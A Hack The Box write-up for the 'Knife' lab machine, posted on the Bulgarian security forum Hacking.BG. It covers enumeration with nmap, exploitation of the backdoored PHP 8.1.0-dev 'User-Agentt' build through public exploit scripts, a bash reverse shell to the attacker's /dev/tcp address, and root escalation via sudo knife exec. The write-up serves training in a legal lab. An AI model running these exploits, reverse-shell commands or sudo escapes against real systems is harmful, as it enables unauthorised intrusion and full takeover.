Преминете към съдържанието

МЕУ организира кампания за пентестове в държавната администрация

Целта на кампанията е да подобри киберсигурността в държавната администрация, като участието в нея е доброволно и не се обвързва с възнаграждение.
Прочети повече за програмата

Добре дошли в Хакинг.БГ! 

Всеки един от нас стои на раменете на гигантите, споделили знанията и опита си с нас.

Този форум е нашият начин да върнем жеста за бъдещите и текущите кадри в киберсигурността.

Стремим се да предоставим платформа, където членовете могат да развиват своите умения, като се дава приоритет на етиката, сигурността и поверителността!

  • HTB - WriteUps


h3xu

173 views

# Enumeration

## nmap

# nmap -p- -A -v 10.10.10.242 -oA knife

<deleted>
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


 

#### Port 80 HTTP
Additional information leaked from headers
![[Pasted image 20210720125601.png]]


#### Searchsploit
Looking at the php, apache versions I have discovered that PHP is vulnerable and there is a python script that spawns shell.

# searchsploit -m php/webapps/49933.py 
  Exploit: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/49933
     Path: /usr/share/exploitdb/exploits/php/webapps/49933.py
File Type: HTML document, ASCII text, with CRLF line terminators

Copied to: /root/49933.py

# Exploit
 

# python3 49933.py                                                                                         1 ⨯
Enter the full host url:
http://knife.htb

Interactive shell is opened on http://knife.htb 
Can't acces tty; job crontol turned off.
$ whoami
james

$ 


# Privilege Escalation
 

$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

$ file /usr/bin/knife                                                                                            
/usr/bin/knife: symbolic link to /opt/chef-workstation/bin/knife                                                 

$ file /opt/chef-workstation/bin/knife                                                                           
/opt/chef-workstation/bin/knife: a /opt/chef-workstation/embedded/bin/ruby --disable-gems script, ASCII text executable
         
$ sudo /usr/bin/knife exec --help
knife exec [SCRIPT] (options)
    -s, --server-url URL             Chef Infra Server URL.
        --chef-zero-host HOST        Host to start Chef Infra Zero on.
        --chef-zero-port PORT        Port (or port range) to start Chef Infra Zero on. Port ranges like 1000,1010 or 8889-9999 will try all given ports until one works.
    -k, --key KEY                    Chef Infra Server API client key.
        --[no-]color                 Use colored output, defaults to enabled.
    -c, --config CONFIG              The configuration file to use.
        --config-option OPTION=VALUE Override a single configuration option.
        --defaults                   Accept default values for all questions.
    -d, --disable-editing            Do not open EDITOR, just accept the data as is.
    -e, --editor EDITOR              Set the editor to use for interactive commands.
        --environment ENVIRONMENT    Set the Chef Infra Client environment (except for in searches, where this will be flagrantly ignored).
    -E, --exec CODE                  A string of Chef Infra Client code to execute.
        --[no-]fips                  Enable FIPS mode.
    -F, --format FORMAT              Which format to use for output. (valid options: 'summary', 'text', 'json', 'yaml', or 'pp')
        --[no-]listen                Whether a local mode (-z) server binds to a port.
    -z, --local-mode                 Point knife commands at local repository instead of Chef Infra Server.
    -u, --user USER                  Chef Infra Server API client username.
        --print-after                Show the data after a destructive operation.
        --profile PROFILE            The credentials profile to select.
    -p, --script-path PATH:PATH      A colon-separated path to look for scripts in.
    -V, --verbose                    More verbose output. Use twice (-VV) for additional verbosity and three times (-VVV) for maximum verbosity.
    -v, --version                    Show Chef Infra Client version.
    -y, --yes                        Say yes to all prompts for confirmation.
    -h, --help                       Show this help message.

$ sudo knife exec -E 'exec "/bin/sh -i"'
No input file specified.

$ exit

$ ^CExiting...


 

Tried multiple inputs but I am constantly getting *No input file specified.* I think it is because of the exploit. Let's find another one.

# wget https://dl.packetstormsecurity.net/2105-exploits/php_8.1.0-dev.py.txt -o php-exploit.py
# cat php-exploit.py
<deleted>
    #Usage: python3 php_8.1.0-dev.py -u http://10.10.10.242/ -c ls
<deleted>

# python3 php-exploit.py -u http://knife.htb -c id
[+] Results:
uid=1000(james) gid=1000(james) groups=1000(james)

# nc -nvlp 1234                                                                                            1 ⨯
listening on [any] 1234 ...

# python3 php-exploit.py -u http://knife.htb -c "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.7/1234 0>&1'"

Now that we have reverse shell and we can freely interact, we can continue on.```bash
 

# nc -nvlp 1234                                                                
listening on [any] 1234 ...

connect to [10.10.14.7] from (UNKNOWN) [10.10.10.242] 51272
bash: cannot set terminal process group (944): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ 
james@knife:/$ 
james@knife:/tmp$ sudo /usr/bin/knife exec -E "exec '/bin/sh -i'"
sudo /usr/bin/knife exec -E "exec '/bin/sh -i'"
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

Pretty good. Enjoy your day! 🙂

0 Comments


Recommended Comments

Няма коментари

HACKING.BG Партньори

transparent1.png.c15979e1dc997cdd3a9941e342368a9b.png2.png.3e2592eadc660ecc831f1fdd569e8eb4.pngLogonobackground.thumb.png.546f31037e975b6fd85c69e35f300db6.png600_489534840.png.72981fb02b90f1986dd7ade4d561e6d0.pngcyberclub-logo-text.png.6e9d11752e2eade43d40337d83365e48.png

×
×
  • Създай ново...

Важна информация!

Политика за сигурност и условия на ползване Privacy Policy